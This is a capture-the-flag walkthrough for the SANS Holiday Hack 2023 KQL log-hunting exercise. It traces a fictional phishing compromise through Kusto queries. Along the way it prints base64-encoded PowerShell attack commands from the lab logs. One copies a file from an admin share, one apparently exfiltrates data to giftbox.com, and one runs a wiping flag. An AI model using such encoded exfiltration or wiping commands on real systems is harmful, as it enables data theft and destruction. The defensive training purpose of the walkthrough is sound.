You can download the solution set from the below link or follow along the article.
Onboarding - Welcome to SANS Holiday Hack 2023!
Make sure you create a cluster and run the scripts given to create tables and the required functions.
For more information, you can check the FAQs at
Now, this is very easy. The following query should give you the desired output.
Employees
| where hostname contains 'laptop' and role =~ 'craftsperson elf'
| distinct username
| count
Question - How many Craftperson Elf's are working from laptops?
Answer – 25
Case 1 Welcome to Operation Giftwrap: Defending the Geese Island network
The first question is What is the email address of the employee who received this phishing email?
This particular problem does give us a link that the attacker had used namely 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
I checked in SecurityAlerts table but could not find anything.
Hence, I turned my attention over to another table which lists down outbound network connections along with Source IP and following is the query.
OutboundNetworkEvents
Running this query gives us the source ip that is 10.10.0.4
We do know that we have a table “Employees” that is used to store employee details such as hostname, username, email address, domain name and so on.
Let us use the source ip to find our employee.
Employees
| where ip_addr == '10.10.0.4'
We can also use another approach that is querying the Email table using the following query.
The above query will give us the answer to all the questions.
Q1 - What is the email address of the employee who received this phishing email?
Q2- What is the email address that was used to send this spear phishing email?
Ans - cwombley@gmail.com
Q3 - What was the subject line used in the spear phishing email?
Ans - [EXTERNAL] Invoice foir reindeer food past due
Case 2 Someone got phished! Let's dig deeper on the victim...
All the details can be fetched from Employee table.
Following is the query –
Employees
| where email_addr == 'alabaster_snowball@santaworkshopgeeseislands.org'
| project role, hostname, ip_addr
Q1- What is the role of our victim in the organization?
Ans- Head Elf
Q2- What is the hostname of the victim's machine?
Ans- Y1US-DESKTOP
Q3- What is the source IP linked to the victim?
Ans- 10.10.0.4
Case 3 That's not good. What happened next?
Q1 - What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!
Query-
OutboundNetworkEvents
| project timestamp
Answer- 2023-12-02T10:12:42Z
Q2- What file is dropped to Alabaster's machine shortly after he downloads the malicious file?
Ans- We can run the following query to check for file creation events using hostname that we had extracted earlier.
FileCreationEvents
| where hostname == 'Y1US-DESKTOP' //'2023-12-02T10:12:42Z'
| sort by timestamp asc
Now, we need to look for all events that happened on 02/12/2023 on and after 10:12
We get the following two results.
The answer is giftwrap.exe
Case 4 A compromised host! Time for a deep dive.
Q1- The attacker created an reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?
Ans- Here, the clue is “ip forwarded to”, let us have a look at the table ProcessEvents and look for string containing forward. We already have the victims hostname so let us utilize that to our advantage.
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and process_commandline contains ''forward'
Following is the output.
The answer is 113.37.9.17
Q2- What is the timestamp when the attackers enumerated network shares on the machine?
Ans- Clue is in the question itself, let us query the same table to look for the string “share”
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and process_commandline contains 'share'
The answer is 2023-12-02T16:51:44Z
Q3- What was the hostname of the system the attacker moved laterally to?
Now, that we have the parent process hash, let’s use that to find the answer.
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
We get a few records and in one of them, we can notice that a network share location was accessed.
The answer is NorthPolefileshare
Case 5 A hidden message
For this case, please make sure that you hit the “Train me for this case” button as it gives a good explanation of base64 encoding and decoding using kql functions.
Without, further ado let us dive into the questions.
Q1- When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?
Ans- We can use the following query to give us the command that was executed on the victims machine. The clue here is “powershell”
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
| where process_commandline contains 'powershell.exe'
| sort by timestamp asc
Answer is 2023-12-24T16:07:47Z
Q2- What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)
Decoding the string using the following query, we get the following output.
print(base64_decode_tostring("KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"))
Output
( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''
Notice that the string is in reverse, let us get it back in order.
You can use any reverse string online webpage to do the work for you.
'' nioj- )}]0[_${% | '' tilps- 'powershell.exe -c Copy-Item \\NorthPolefileshare\c$\MissionCritical\NaughtyNiceList.txt C:\Desktop\NaughtyNiceList.txt' (
Looking at the above output, we have our answer that is NaughtyNiceList.txt
Q3- The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?
Ans- Let us run the same query again and decode string from the second and third output.
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
| where process_commandline contains 'powershell.exe'
| sort by timestamp asc
Decoding the second string, we get an output.
print(base64_decode_tostring("W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4="))
We can see the output is a join of lots of numbers. I copied the entire number array into excel and replace all commas with blank space. I then went to a decimal to ascii convertor online and inserted the number array as can be seen below.
This gives us our answer that is giftbox.com
Case 6 - The final step!
Q1- What is the name of the executable the attackers used in the final malicious command?
Ans- Rather than going back and forth to decode the base64 strings, let us leverage the parse operator to decode and get the output in the same query itself.
ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f' and process_commandline contains '-enc'
| parse-where process_commandline with @'C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc ' base64string
| extend DecodedBase64 = base64_decode_tostring(base64string)
| project timestamp, parent_process_name, DecodedBase64
Looking at the last output, we can see the name of the executable that is downwithsanta.exe
Q2- What was the command line flag used alongside this executable?
Using the same query as above, the parameter used alongside this executable command is
–wipeall
Congratulations, that is it! You can do the last one to get the decoded base64 string that is
